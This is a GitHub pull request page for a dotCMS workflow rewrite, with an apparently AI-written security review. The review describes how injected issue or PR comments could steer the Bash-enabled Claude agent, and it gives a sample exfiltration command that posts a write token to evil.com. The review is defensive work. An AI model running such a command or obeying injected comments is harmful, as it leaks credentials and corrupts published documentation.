autodoc: rewrite workflow to be self-contained (no uv) by jdcmsd · Pull Request #495 · dotCMS/core-workflow-test

jdcmsd · 2026-06-24T10:46:36Z

Rewrites the issue_autodoc.yml workflow to eliminate the uv / Python-script dependency, making it self-contained.

What changed:

Removed: Set up uv, Install autodoc dependencies, uv run python finalize.py steps
Build eval context: Python3 stdlib + gh CLI in a heredoc (no pip, no venv)
Run Claude: unchanged — claude --print --allowedTools Bash,Write < /tmp/eval_context.md
Finalize: pure shell + inline Python3 heredocs for JSON payloads; gh issue comment for posting; curl for dotCMS EDIT/NEW; git push for committing
Fixed jq null-parent bug in preflight guard
Reads prompts/burlap.txt directly (no YAML parsing)

This mirrors the change in dotCMS/core PR dotCMS#36294 and resolves the ordering dependency on the dotcms-aios PR.

claude · 2026-06-24T11:54:43Z

Claude finished @jdcmsd's task in 1m 58s —— View job

Review: autodoc self-contained rewrite

The rewrite is well-structured and the slug/UUID validation guards are a genuine improvement. A few things worth a second look, ordered by severity.

🔴 High — Prompt injection into a Bash-enabled agent holding write secrets

Build eval context assembles /tmp/eval_context.md from fully untrusted input: the epic body, epic comments, and the body + comments of every related PR (.github/workflows/issue_autodoc.yml:115-167). Comments and PRs can come from arbitrary external contributors. That file is then piped straight into:

claude --print --allowedTools Bash,Write < /tmp/eval_context.md   # line 195

The autodoc job sets these at job level (lines 69-78), so the Run Claude step inherits all of them in its environment:

ANTHROPIC_API_KEY
AUTODOC_DOTCMS_API_TOKEN_AISEARCH
AUTODOC_DOTCMS_API_TOKEN_DRAFTING (write-capable — used by finalize to fire EDIT/NEW)
AUTODOC_DOTCMS_BASE_URL, AUTODOC_DOTCMS_SITE_FOLDER

Since Claude has Bash and network access (it's expected to curl per the comment on line 74), a crafted issue/PR comment can instruct the model to exfiltrate those tokens (curl evil.com -d "$AUTODOC_DOTCMS_API_TOKEN_DRAFTING") or directly write/poison dotCMS documentation content. The 4000-char comment filter (line 121) does not mitigate this — an injection payload is short.

This is the core risk of the design, not a regression, but the rewrite keeps it. Worth considering:

Drop Bash from --allowedTools if the prompt doesn't strictly need it, or run the step network-restricted.
Treat the report content as untrusted before it's pushed to live docs in finalize.

🔴 High — Secret over-provisioning to the Claude step

Even setting injection aside, the Run Claude step only needs ANTHROPIC_API_KEY (+ the read AISEARCH token if the prompt curls). The write AUTODOC_DOTCMS_API_TOKEN_DRAFTING is only used by the finalize step's EDIT/NEW calls, yet job-level env exposes it to every step. Scope secrets per-step (env: on the individual step) so the agent never sees the write token:

Run Claude → ANTHROPIC_API_KEY, AUTODOC_DOTCMS_API_TOKEN_AISEARCH
Post comment… → AUTODOC_DOTCMS_API_TOKEN_DRAFTING, GH_TOKEN, base URL, site folder

🟠 Medium — Report is committed last, after the fragile network calls

The durable record (git commit of the report, lines 292-298) runs after the dotCMS curl calls. GitHub Actions runs steps with set -eo pipefail, and --fail-with-body makes a non-2xx dotCMS response fail the step. So a transient dotCMS error means: comment already posted, but the generated report is never committed to dotcms-aios and is lost with the runner. Consider committing the report before applying to dotCMS, so the expensive Claude output is always persisted.

🟠 Medium — `action` parsed differently from every other meta field

ACTION=$(awk '... p && /^action:/{print $2; exit}' "$REPORT")   # line 222

The PR description says "All fields use sub() to preserve the full value," but action uses print $2. That breaks on action:update (no space → empty) or action: update now (trailing junk ignored, may mask a malformed report). Use the same sub(/^action:[[:space:]]*/,"") pattern for consistency and robustness.

🟠 Medium — No `concurrency` group

If an epic is closed → reopened → closed in quick succession (or two qualifying issues close near-simultaneously and target the same report path / comment), two autodoc jobs race on the comment PATCH and the git push origin HEAD (line 297). The push can fail non-fast-forward. Add a concurrency: group keyed on the epic number to serialize.

🟡 Low / nits

Slug regex ^[a-z0-9][a-z0-9-]*[a-z0-9]$ (line 227) requires ≥2 chars — a legitimate single-char urlTitle is rejected. Use ^[a-z0-9]([a-z0-9-]*[a-z0-9])?$ if single chars are valid.
Redundant check grep -qE '<uuid>' && [ -n "$IDENTIFIER" ] (line 240) — an empty string can't match the UUID regex, so -n is dead.
Unpinned npm install -g @anthropic-ai/claude-code (line 94) — acknowledged in the comment; flagging only for supply-chain awareness.
Python nits — open(vault_file).read() (line 175) and other open()s leak handles and use no explicit encoding. Trivial for a short-lived script.

Note: I can't modify files under .github/workflows/ (GitHub App permission limitation), so this is review-only — no changes pushed.

- Fix -f → -F on gh api PATCH so the file is read, not sent literally - Prepend  marker in finalize before posting so idempotent edit lookup works (marker was not in the report itself) - Add --paginate to comment lookup to search beyond the first page - Use jq first // empty instead of | head -1 to avoid SIGPIPE - Fix urlTitle awk to use sub() consistent with title/tags/seoDescription - Remove -k (TLS bypass); add --fail-with-body to dotCMS curl calls - Add comment clarifying AUTODOC_DOTCMS_API_TOKEN_AISEARCH is used by the Claude subprocess via burlap.txt, not directly by a workflow step

- Make git push conditional on commit succeeding (|| true was causing unconditional push even when there was nothing new to commit) - Add git push origin HEAD for explicit branch targeting - Validate urlTitle is a URL slug before interpolating into JSON query (non-slug chars would break the shell-built -d payload) - Validate IDENTIFIER matches UUID format before placing in URL - Add comment on unpinned npm install explaining the tradeoff

jdcmsd requested a review from a team as a code owner June 24, 2026 10:46

feat(autodoc): rewrite workflow to be self-contained (no uv)

26b0c94

jdcmsd force-pushed the autodoc-consolidate-and-rename branch from abccc4a to 26b0c94 Compare June 24, 2026 11:53

github-actions Bot added the Area : CI/CD label Jun 24, 2026

claude Bot added the AI: Safe To Rollback label Jun 24, 2026

github-actions Bot removed the AI: Safe To Rollback label Jun 24, 2026

claude Bot added the AI: Safe To Rollback label Jun 24, 2026

github-actions Bot removed the AI: Safe To Rollback label Jun 24, 2026

claude Bot added the AI: Safe To Rollback label Jun 24, 2026

jdcmsd merged commit f6d81d9 into main Jun 24, 2026
20 of 21 checks passed

jdcmsd deleted the autodoc-consolidate-and-rename branch June 24, 2026 16:34

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

autodoc: rewrite workflow to be self-contained (no uv)#495

autodoc: rewrite workflow to be self-contained (no uv)#495
jdcmsd merged 3 commits into
mainfrom
autodoc-consolidate-and-rename

jdcmsd commented Jun 24, 2026

Uh oh!

claude Bot commented Jun 24, 2026 •

edited

Loading

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

jdcmsd commented Jun 24, 2026

Uh oh!

claude Bot commented Jun 24, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Review: autodoc self-contained rewrite

🔴 High — Prompt injection into a Bash-enabled agent holding write secrets

🔴 High — Secret over-provisioning to the Claude step

🟠 Medium — Report is committed last, after the fragile network calls

🟠 Medium — action parsed differently from every other meta field

🟠 Medium — No concurrency group

🟡 Low / nits

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

claude Bot commented Jun 24, 2026 •

edited

Loading

🟠 Medium — `action` parsed differently from every other meta field

🟠 Medium — No `concurrency` group